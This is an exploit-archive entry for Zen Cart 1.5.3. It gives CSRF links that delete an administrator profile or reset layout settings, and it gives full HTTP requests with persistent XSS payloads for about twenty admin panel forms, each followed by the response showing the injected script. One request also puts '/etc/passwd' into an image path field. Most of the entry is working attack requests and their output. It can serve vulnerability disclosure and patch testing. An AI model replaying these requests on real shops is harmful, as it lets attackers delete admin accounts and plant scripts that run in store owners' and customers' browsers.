Zen Cart 1.5.3 - CSRF & Admin Panel XSS

2014-07-10T00:00:00
ID 1337DAY-ID-22425
Type zdt
Reporter Smash_
Modified 2014-07-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
#Date: 09.07.14
#Vendor: zen-cart.com
#Tested on: Apache 2.2 [at] Linux
#Contact: smash[at]devilteam.pl

#1 - CSRF

- Delete admin

GET profile stands for user id.

localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2

- Reset layout boxes to default

localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults


#2 - Persistent XSS in admin panel

Since admin privileges are required to execute following vulnerablities this is not a serious threat.

- Extras -> Media types -> Add

Vulnerable parameters - type_name & type_exit

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
Content-Length: 663

-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_name"

<h1>sup<!--
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="type_ext"

sup<>
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="x"

19
-----------------------------4978676881674017321390852339
Content-Disposition: form-data; name="y"

13
-----------------------------4978676881674017321390852339--

Response:
(...)
<td class="dataTableContent"><h1>sup<!--</td>
<td class="dataTableContent">sup<></td>
<td class="dataTableContent" align="right">
(...)

- Extras -> Media manager -> Add

Vulnerable parameter - media_name

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
Content-Length: 5633

-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_name"

<script>alert(666)</script>
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="x"

32
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="y"

16
-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
Content-Type: image/png

(image)

-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_dir"


-----------------------------1835318161847256146721022401
Content-Disposition: form-data; name="media_type"

2
-----------------------------1835318161847256146721022401--

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
  <td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
</tr>

- Extras -> Music genre -> Add

Vulenrable parameter - music_genre_name

POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
Content-Length: 581

-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="music_genre_name"

<script>alert(666)</script>
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="x"

37
-----------------------------202746648818048680751007920584
Content-Disposition: form-data; name="y"

10
-----------------------------202746648818048680751007920584--

Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)

Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1

Response:
(...)
<div id="navBreadCrumb">  <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
(...)

- Extras -> Record companies -> Add

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
Content-Length: 5828

-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="securityToken"

b98019227f8014aed6d22b02f0748d11
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_name"

<script>alert(666)</script>
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
Content-Type: image/png

-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="img_dir"

categories/
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_image_manual"

/etc/passwd
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="record_company_url[1]"

'>"><>XSS
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="x"

21
-----------------------------19884630671863875697751588711
Content-Disposition: form-data; name="y"

13
-----------------------------19884630671863875697751588711--

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
<tr class="infoBoxHeading">
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
</tr>
(...)

Further vuln:
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1

Response:
(...)
<div id="navBreadCrumb">  <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
<script>alert(666)</script>
</div>
<div class="centerColumn" id="indexProductList">
<h1 id="productListHeading"><script>alert(666)</script></h1>
(...)

- Extras -> Recording Artists -> Add

Vulnerable parameter - artists_name

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
Content-Length: 1099

-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="securityToken"

84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_name"

<script>alert(666)</script>
-----------------------------14015448418946681711346093460
(Content-Disposition: form-data; name="artists_image"; filename=""
Content-Type: application/octet-stream


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="img_dir"


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_image_manual"


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="artists_url[1]"


-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="x"

39
-----------------------------14015448418946681711346093460
Content-Disposition: form-data; name="y"

19
-----------------------------14015448418946681711346093460--)

Response:
(...)
<td class="dataTableContent"><script>alert(666)</script></td>
<td class="dataTableContent" align="right">
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
  </tr>
(...)

- Gift Certificate/Coupons ->  Coupon admin -> Add

Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: localhost

securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10

Response:
(...)

      <tr>
        <td align="left">Coupon Name</td>
        <td align="left">'>"><>XSSD</td>
      </tr>
      <tr>
        <td align="left">Coupon Description <br />(Customer can see)</td>
        <td align="left">'>"><>XSSD</td>
      </tr>
      <tr>
        <td align="left">Coupon Amount</td>
        <td align="left"></td>
      </tr>

      <tr>
        <td align="left">Coupon Minimum Order</td>
        <td align="left">'>"><>XSSD</td>
      </tr>

      <tr>
        <td align="left">Free Shipping</td>
        <td align="left">Free Shipping</td>
      </tr>
      <tr>
        <td align="left">Coupon Code</td>
        <td align="left">'>"><>XSSD</td>
      </tr>

      <tr>
        <td align="left">Uses per Coupon</td>
        <td align="left">'>"><>XSSD</td>
      </tr>

      <tr>
        <td align="left">Uses per Customer</td>
        <td align="left">'>"><>XSSD</td>
      </tr>
(...)

- Gift Certificate/Coupons -> Mail gift certificate -> Send

Vulnerable parameter - email_to

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
Host: localhost

securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12

Response:
(...)
</tr>
<tr>
<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
</tr>
<tr>
(...)

- Tools -> Banner manager -> Add

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
Content-Length: 2317

-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="securityToken"

84c8fe52eb9b3b0e026b5438e1c21f6f
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="status"

1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_open_new_windows"

0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_on_ssl"

1
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_title"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_url"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_group"

BannersAll
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="new_banners_group"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image"; filename=""
Content-Type: application/octet-stream


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_local"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_image_target"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_html_text"

'>"><>XSS
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="banners_sort_order"

15
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="date_scheduled"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_date"


-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="expires_impressions"

0
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="x"

9
-----------------------------3847719184268426731396009422
Content-Disposition: form-data; name="y"

7
-----------------------------3847719184268426731396009422--


Response:
(...)
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">'>"><>XSS</td>
<td class="dataTableContent" align="right">0 / 0</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)

- Tools -> Newsletter and Product Notifications Manager -> New newsletter

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
Host: localhost

securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8

Response:
(...)
<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
<td class="dataTableContent" align="right">18 bytes</td>
(...)
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)

- Tools -> EZ-Pages -> New file

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
Content-Length: 2253

-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="securityToken"

c74a83cefbb5ffc1868dd4a390bd0880
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="x"

41
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="y"

17
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_title"

'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="page_open_new_window"

0
-----------------------------134785397313015614741294511591

(...)

-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="pages_html_text"

'>"><>XSS
-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url"


-----------------------------134785397313015614741294511591
Content-Disposition: form-data; name="alt_url_external"


-----------------------------134785397313015614741294511591--

Response:
(...)
<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
<td class="dataTableContent">&nbps;'>"><>XSS</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
  </tr>
(...)

- Localization -> Currencies -> New currency

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)
  <tr>
    <td class="infoBoxContent"><br>Title: '>"><>XSS</td>
  </tr>
  <tr>
    <td class="infoBoxContent">Code: '>"</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
  </tr>
  <tr>
    <td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
  </tr>
(...)
  <tr>
    <td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
  </tr>
</table>
(...)
  <tr>
    <td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
  </tr>

- Localization -> Languages -> New language

Affects big part of admin panel.

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20
  
Response:
(...)
    <td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
  </tr>
</table>
(...)
                <td class="dataTableContent">'>"><>XSS</td>
                <td class="dataTableContent">xs</td>
(...)
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)
  <tr>
    <td class="infoBoxContent"><br>Name: '>"><>XSS</td>
  </tr>
  <tr>
    <td class="infoBoxContent">Code: xs</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
  </tr>
(...)

Further injection:
http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php

- Localization -> Orders status -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7

Response:
(...)
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
(...)

- Locations / Taxes -> Zones -> New zone

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent" align="center">'>"><>XSS</td>
(...)
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
</table>
(...)
  <tr>
    <td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Country: '>"><>XSS</td>

- - Locations / Taxes -> Zone definitions -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13

Response:
(...)
</a>&nbps;'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>

- Locations / Taxes -> Tax Classes -> New tax class

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
(...)
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
(...)
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)

- - Locations / Taxes -> Tax Rates -> New tax rate

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_rates.php?page=1&action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_id=2&tax_zone_id=2&tax_rate=66&tax_description=%27%3E%22%3E%3C%3EXSS&tax_priority=&x=32&y=16

Response:
(...)
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">66%</td>
<td class="dataTableContent">'>"><>XSS</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)
    <td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
(...)


- Customers -> Group Pricing -> Insert

Request:
POST /zen/zen-cart-v1.5.3-07042014/admin123/group_pricing.php?action=insert HTTP/1.1
Host: localhost

securityToken=c74a83cefbb5ffc1868dd4a390bd0880&group_name=%27%3E%22%3E%3C%3EXSS&group_percentage=%27%3E%22%3E%3C%3EXSS&x=10&y=9

Response:
(...)
<td class="dataTableContent">1</td>
<td class="dataTableContent">'>"><>XSS</td>
<td class="dataTableContent">0.00</td>
(...)
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>'>"><>XSS</b></td>
  </tr>
(...)

#  0day.today [2018-01-01]  #